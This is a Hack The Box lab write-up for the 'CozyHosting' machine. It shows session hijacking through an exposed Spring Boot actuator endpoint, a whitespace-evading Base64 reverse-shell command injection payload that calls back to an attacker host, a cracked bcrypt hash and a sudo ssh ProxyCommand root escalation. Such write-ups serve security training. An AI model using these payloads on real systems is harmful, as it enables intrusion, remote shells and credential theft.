CozyHosting

Platform: Hack The Box

Category/Tags: Linux, Command Injection, Misconfiguration

Difficulty: Easy

Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I do an nmap scan.

nmap -sC -sV <MACHINE_IP> -oN results.nmap
nmap results

  • Open ports

    • Port 80 - http

    • Port 22 - ssh

This is the landing page for hosting solutions. There is also a login page, I tried some default and common credentials and some basic SQL injections. But no luck.

landing page
login page

I did some directory fuzzing using ffuf, some of the paths have status codes of 401 (unauthorized), 204 (no content), and 500 (internal server error). So, I use an alternative tool like dirsearch.

dirsearch -e * -u <MACHINE_IP>

Among the results, the Spring Boot Actuator endpoints caught my attention, especially the /sessions

Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. From Spring Documentation.

actuator endpoints

I visit the http://<MACHINE_IP>/actuator/sessions . It shows me a token of user kanderson that can be used for logging in.

auth token

Go to Inspect > Storage > Cookies and change the value of JSESSIONID using the token (random strings) we saw earlier. Gotcha, we have access to the dashboard as K. Anderson.

admin dashboard

Foothold

I explored the dashboard, but all of the components are not working aside from connection settings, where we can input some hostname and username. So I guess this is connecting to some SSH remote server. I tried some of the hostname and username SSH credentials, but I keep getting this error,

ssh connection error

So, I tried to inject Linux commands to see how the web app reacted to the input. I opened BurpSuite, intercepted the request for SSH connection functionality, and played some commands. Luckily,it is vulnerable to command injection.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. From OWASP.

burpsuite request and response

We can now get the shell. To set up a listener,

nc -lnvp 1234

But I ran into problems. If I supply a command that has spaces, I will get the error Username can't contain whitespaces!

burpsuite response

After some time of research, We need to encode the payload to Base64 and ${IFS} to escape whitespaces.

Internal Field Separator (IFS), determines how Bash recognizes word boundaries while splitting a sequence of character strings. The default value of IFS is a three-character string comprising a space, tab, and newline. From Baeldung Linux.

Now, this is the crafted payload to be supplied in the username parameter. The Base64 encoded string is the encoded version of reverse shell payload sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1 . It will decode it using Base64 and then spit it out as a bash command.

;$(echo${IFS}"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvMTIzNCAwPiYxCg=="|base64${IFS}-d|bash)#

Here it is, we got the shell. And this is the user named app.

app shell

And, user named app is not our low-privileged user.

/home

In the current directory, I found a jar file. I sent this to my local machine to decompile.

python -m http.server 8000

And then I download the jar file to my local machine and open it in Java Decompiler. Another thing that caught my attention is the PostgreSQL credentials under classes/application.properties.

application.properties

I tried to connect to the cozyhosting database using psql command,

psql -h localhost -U postgres -d cozyhosting

#to show the tables
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public';

#to query the values in the users table
SELECT * FROM users;

I got the password for admin, and I think it was encoded using bcrypt.

users table

So, as usual, I decrypt this using John.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt <HASH_FILE>

Gotcha! We have the password for admin.

john the ripper

I used the password for user admin, and it is not working, so I guess this is the password for user Josh.

ssh josh@<MACHINE_IP>

We got the user shell!

user shell

Privilege Escalation

The privilege escalation on this machine is the easiest part.

I use this command because I want to know if Josh granted permissions with the use of the sudo command.

sudo -l

Based on the output, Josh can run the ssh command with root privileges.

sudo -l

So, I headed to GTFOBins to find commands for ssh to get root privilege. This command may elevate or maintain privileged access if the user allows to run sudo in the ssh command.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Luckily, I got the root shell.

root shell

Mitigation

  • Sanitize the user input to prevent command injection

  • Don’t give root permissions to low-privileged users

PreviousPerfectionNext0xBOverchunked: SQL Injection

Last updated